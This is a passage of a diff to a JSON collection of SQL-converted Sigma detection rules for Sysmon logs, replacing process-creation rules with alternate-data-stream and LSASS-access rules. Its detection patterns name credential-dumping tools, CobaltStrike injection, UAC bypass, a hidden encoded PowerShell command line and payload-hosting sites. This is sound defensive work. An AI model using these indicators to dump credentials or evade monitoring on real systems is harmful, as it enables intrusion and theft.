Contents LIKE '%://7%' ESCAPE '\\' OR Contents LIKE '%://8%' ESCAPE '\\' OR Contents LIKE '%://9%' ESCAPE '\\') AND TargetFilename LIKE '%:Zone.Identifier' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml" + "filename": "create_stream_hash_winget_susp_package_source.yml" }, { - "title": "HackTool - KrbRelayUp Execution", - "id": "12827a56-61a4-476a-a9cb-f3068f191073", + "title": "Suspicious File Download From File Sharing Websites", + "id": "52182dfb-afb7-41db-b4bc-5336cb29b464", "status": "experimental", - "description": "Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced", + "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1558.003", - "attack.lateral_movement", - "attack.t1550.003" + "attack.defense_evasion", + "attack.s0139", + "attack.t1564.004" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\KrbRelayUp.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelayUp.exe') OR (CommandLine LIKE '% relay %' ESCAPE '\\' AND CommandLine LIKE '% -Domain %' ESCAPE '\\' AND CommandLine LIKE '% -ComputerName %' ESCAPE '\\') OR (CommandLine LIKE '% krbscm %' ESCAPE '\\' AND CommandLine LIKE '% -sc %' ESCAPE '\\') OR (CommandLine LIKE '% spawn %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -cn %' ESCAPE '\\' AND CommandLine LIKE '% -cp %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Contents LIKE '%https://transfer.sh/%' ESCAPE '\\' OR Contents LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%pastebin.com%' ESCAPE '\\' OR Contents LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Contents LIKE '%mediafire.com%' ESCAPE '\\' OR Contents LIKE '%mega.nz%' ESCAPE '\\' OR Contents LIKE '%ddns.net%' ESCAPE '\\' OR Contents LIKE '%.paste.ee%' ESCAPE '\\' OR Contents LIKE '%.hastebin.com%' ESCAPE '\\' OR Contents LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Contents LIKE '%ufile.io%' ESCAPE '\\' OR Contents LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Contents LIKE '%anonfiles.com%' ESCAPE '\\' OR Contents LIKE '%send.exploit.in%' ESCAPE '\\' OR Contents LIKE '%privatlab.net%' ESCAPE '\\' OR Contents LIKE '%privatlab.com%' ESCAPE '\\' OR Contents LIKE '%sendspace.com%' ESCAPE '\\' OR Contents LIKE '%pastetext.net%' ESCAPE '\\' OR Contents LIKE '%pastebin.pl%' ESCAPE '\\' OR Contents LIKE '%paste.ee%' ESCAPE '\\') AND (TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cpl:Zone%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_krbrelayup.yml" + "filename": "create_stream_hash_file_sharing_domains_download_susp_extension.yml" }, { - "title": "Trickbot Malware Reconnaissance Activity", - "id": "410ad193-a728-4107-bc79-4419789fcbf8", + "title": "Exports Registry Key To an Alternate Data Stream", + "id": "0d7a9363-af70-4e7b-a3b7-1a176b7fbe84", "status": "test", - "description": "Detects potential reconnaissance activity used by Trickbot malware. Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes.", - "author": "David Burkett, Florian Roth", + "description": "Exports the target Registry key and hides it in the specified alternate data stream.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ - "attack.discovery", - "attack.t1482" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Rare System Admin Activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND Image LIKE '%\\\\nltest.exe' ESCAPE '\\' AND CommandLine LIKE '%/domain\\_trusts /all\\_trusts%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regedit.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_trickbot_recon_activity.yml" + "filename": "create_stream_hash_regedit_export_to_ads.yml" }, { - "title": "Suspicious LOLBIN AccCheckConsole", - "id": "0f6da907-5854-4be6-859a-e9958747b0aa", - "status": "test", - "description": "Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL", - "author": "Florian Roth (Nextron Systems)", + "title": "Unusual File Download from Direct IP Address", + "id": "025bd229-fd1f-4fdb-97ab-20006e1a5368", + "status": "experimental", + "description": "Detects the download of suspicious file type from URLs with IP", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Legitimate use of the UI Accessibility Checker" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\AccCheckConsole.exe' ESCAPE '\\' OR OriginalFileName = 'AccCheckConsole.exe') AND (CommandLine LIKE '% -window %' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Contents REGEXP 'http[s]?://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}' AND (TargetFilename LIKE '%.ps1:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.bat:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_acccheckconsole.yml" + "filename": "create_stream_hash_susp_ip_domains.yml" }, { - "title": "HackTool - Wmiexec Default Powershell Command", - "id": "022eaba8-f0bf-4dd9-9217-4604b0bb3bb0", + "title": "HandleKatz Duplicating LSASS Handle", + "id": "b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5", "status": "experimental", - "description": "Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles", + "author": "Bhabesh Raj (rule), @thefLinkk", "tags": [ + "attack.execution", + "attack.t1106", "attack.defense_evasion", - "attack.lateral_movement" + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1440' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%)' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_wmiexec_default_powershell.yml" + "filename": "proc_access_win_handlekatz_lsass_access.yml" }, { - "title": "Suspicious PowerShell Parent Process", - "id": "754ed792-634f-40ae-b3bc-e0448d33f695", - "status": "test", - "description": "Detects a suspicious or uncommon parent processes of PowerShell", - "author": "Teymur Kheirkhabarov, Harish Segar", + "title": "Direct Syscall of NtOpenProcess", + "id": "3f3f3506-1895-401b-9cc3-e86b16e630d0", + "status": "experimental", + "description": "Detects the usage of the direct syscall of NtOpenProcess which might be done from a CobaltStrike BOF.", + "author": "Christian Burkard (Nextron Systems), Tim Shelton", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1106" ], "falsepositives": [ - "Other scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%tomcat%' ESCAPE '\\' OR (ParentImage LIKE '%\\\\amigo.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\browser.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\chrome.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\firefox.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\jbosssvc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\microsoftedgecp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MicrosoftEdgeSH.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\outlook.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\safari.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqlagent.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqlserver.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\')) AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR (CommandLine LIKE '%/c powershell%' ESCAPE '\\' OR CommandLine LIKE '%/c pwsh%' ESCAPE '\\') OR Description = 'Windows PowerShell' OR Product = 'PowerShell Core 6' OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CallTrace LIKE 'UNKNOWN%' ESCAPE '\\' AND NOT ((TargetImage LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceUI.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\' AND SourceImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\systeminfo.exe' ESCAPE '\\' AND SourceImage LIKE '%setup64.exe' ESCAPE '\\') OR (TargetImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\' AND SourceImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Discord\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Discord.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\AUDIODG.EXE' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND GrantedAccess = '0x1000') OR (Provider_Name = 'Microsoft-Windows-Kernel-Audit-API-Calls') OR (TargetImage LIKE '%\\\\Evernote\\\\Evernote.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_susp_parent_process.yml" + "filename": "proc_access_win_direct_syscall_ntopenprocess.yml" }, { - "title": "Disabled Volume Snapshots", - "id": "dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a", + "title": "UAC Bypass Using WOW64 Logger DLL Hijack", + "id": "4f6c43e2-f989-4ea5-bcd8-843b49a0317c", "status": "test", - "description": "Detects commands that temporarily turn off Volume Snapshots", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate administration" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Services\\\\VSS\\\\Diag%' ESCAPE '\\' AND CommandLine LIKE '%/d Disabled%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' AND GrantedAccess = '0x1fffff' AND CallTrace LIKE 'UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_volsnap_disable.yml" + "filename": "proc_access_win_uac_bypass_wow64_logger.yml" }, { - "title": "Suspicious Manipulation Of Default Accounts Via Net.EXE", - "id": "5b768e71-86f2-4879-b448-81061cbae951", - "status": "experimental", - "description": "Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "CobaltStrike BOF Injection Pattern", + "id": "09706624-b7f6-455d-9d02-adee024cee1d", + "status": "test", + "description": "Detects a typical pattern of a CobaltStrike BOF which inject into other processes", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.execution", + "attack.t1106", + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND CommandLine LIKE '% user %' ESCAPE '\\' AND (CommandLine LIKE '% Järjestelmänvalvoja %' ESCAPE '\\' OR CommandLine LIKE '% Rendszergazda %' ESCAPE '\\' OR CommandLine LIKE '% Администратор %' ESCAPE '\\' OR CommandLine LIKE '% Administrateur %' ESCAPE '\\' OR CommandLine LIKE '% Administrador %' ESCAPE '\\' OR CommandLine LIKE '% Administratör %' ESCAPE '\\' OR CommandLine LIKE '% Administrator %' ESCAPE '\\' OR CommandLine LIKE '% guest %' ESCAPE '\\' OR CommandLine LIKE '% DefaultAccount %' ESCAPE '\\' OR CommandLine LIKE '% \"Järjestelmänvalvoja\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Rendszergazda\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Администратор\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrateur\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrador\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administratör\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrator\" %' ESCAPE '\\' OR CommandLine LIKE '% \"guest\" %' ESCAPE '\\' OR CommandLine LIKE '% \"DefaultAccount\" %' ESCAPE '\\' OR CommandLine LIKE '% ''Järjestelmänvalvoja'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Rendszergazda'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Администратор'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrateur'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrador'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administratör'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrator'' %' ESCAPE '\\' OR CommandLine LIKE '% ''guest'' %' ESCAPE '\\' OR CommandLine LIKE '% ''DefaultAccount'' %' ESCAPE '\\')) AND NOT (CommandLine LIKE '%guest%' ESCAPE '\\' AND CommandLine LIKE '%/active no%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CallTrace REGEXP '^C:\\\\Windows\\\\SYSTEM32\\\\ntdll\\.dll\\+[a-z0-9]{4,6}\\|C:\\\\Windows\\\\System32\\\\KERNELBASE\\.dll\\+[a-z0-9]{4,6}\\|UNKNOWN\\([A-Z0-9]{16}\\)$' AND GrantedAccess IN ('0x1028', '0x1fffff'))" ], - "filename": "proc_creation_win_net_default_accounts_manipulation.yml" + "filename": "proc_access_win_cobaltstrike_bof_injection_pattern.yml" }, { - "title": "Base64 MZ Header In CommandLine", - "id": "22e58743-4ac8-4a9f-bf19-00a0428d8c5f", - "status": "experimental", - "description": "Detects encoded base64 MZ header in the commandline", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Load Undocumented Autoelevated COM Interface", + "id": "fb3722e4-1a06-46b6-b772-253e2e7db933", + "status": "test", + "description": "COM interface (EditionUpgradeManager) that is not used by standard executables.", + "author": "oscd.community, Dmitry Uchakin", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR CommandLine LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR CommandLine LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CallTrace LIKE '%editionupgrademanagerobj.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_inline_base64_mz_header.yml" + "filename": "proc_access_win_load_undocumented_autoelevated_com_interface.yml" }, { - "title": "Console CodePage Lookup Via CHCP", - "id": "7090adee-82e2-4269-bd59-80691e7c6338", - "status": "experimental", - "description": "Detects use of chcp to look up the system locale value as part of host discovery", - "author": "_pete_0, TheDFIRReport", + "title": "Credential Dumping by Pypykatz", + "id": "7186e989-4ed7-4f4e-a656-4674b9e3e48b", + "status": "test", + "description": "Detects LSASS process access by pypykatz for credential dumping.", + "author": "Bhabesh Raj", "tags": [ - "attack.discovery", - "attack.t1614.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command." + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% /c %' ESCAPE '\\' OR ParentCommandLine LIKE '% /r %' ESCAPE '\\' OR ParentCommandLine LIKE '% /k %' ESCAPE '\\') AND Image LIKE '%\\\\chcp.com' ESCAPE '\\' AND (CommandLine LIKE '%chcp' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%libffi-7.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python3%.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" ], - "filename": "proc_creation_win_chcp_codepage_lookup.yml" + "filename": "proc_access_win_pypykatz_cred_dump_lsass_access.yml" }, { - "title": "HackTool - SharpImpersonation Execution", - "id": "f89b08d0-77ad-4728-817b-9b16c5a69c7a", - "status": "experimental", - "description": "Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", - "author": "Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems)", + "title": "LSASS Memory Access by Tool Named Dump", + "id": "9bd012ee-0dff-44d7-84a0-aa698cfd87a3", + "status": "test", + "description": "Detects a possible process memory dump based on a keyword in the file name of the accessing process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1134.001", - "attack.t1134.003" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Rare programs that contain the word dump in their name and access lsass" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpImpersonation.exe' ESCAPE '\\' OR OriginalFileName = 'SharpImpersonation.exe' OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% binary:%' ESCAPE '\\') OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% shellcode:%' ESCAPE '\\') OR (CommandLine LIKE '% technique:CreateProcessAsUserW%' ESCAPE '\\' OR CommandLine LIKE '% technique:ImpersonateLoggedOnuser%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%dump%' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharp_impersonation.yml" + "filename": "proc_access_win_lsass_memdump_indicators.yml" }, { - "title": "Suspicious Rundll32 Activity Invoking Sys File", - "id": "731231b9-0b5d-4219-94dd-abb6959aa7ea", - "status": "test", - "description": "Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452", + "title": "SysmonEnte Usage", + "id": "d29ada0f-af45-4f27-8f32-f7b77c3dbc4e", + "status": "experimental", + "description": "Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND (CommandLine LIKE '%.sys,%' ESCAPE '\\' OR CommandLine LIKE '%.sys %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND GrantedAccess = '0x1400') AND NOT (((SourceImage LIKE 'C:\\\\Program Files%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\'))) OR CallTrace = 'Ente'))" ], - "filename": "proc_creation_win_rundll32_sys.yml" + "filename": "proc_access_win_hack_sysmonente.yml" }, { - "title": "TA505 Dropper Load Pattern", - "id": "18cf6cf0-39b0-4c22-9593-e244bdc9a2d4", + "title": "Malware Shellcode in Verclsid Target Process", + "id": "b7967e22-3d7e-409b-9ed5-cdae3f9243a1", "status": "test", - "description": "Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents", - 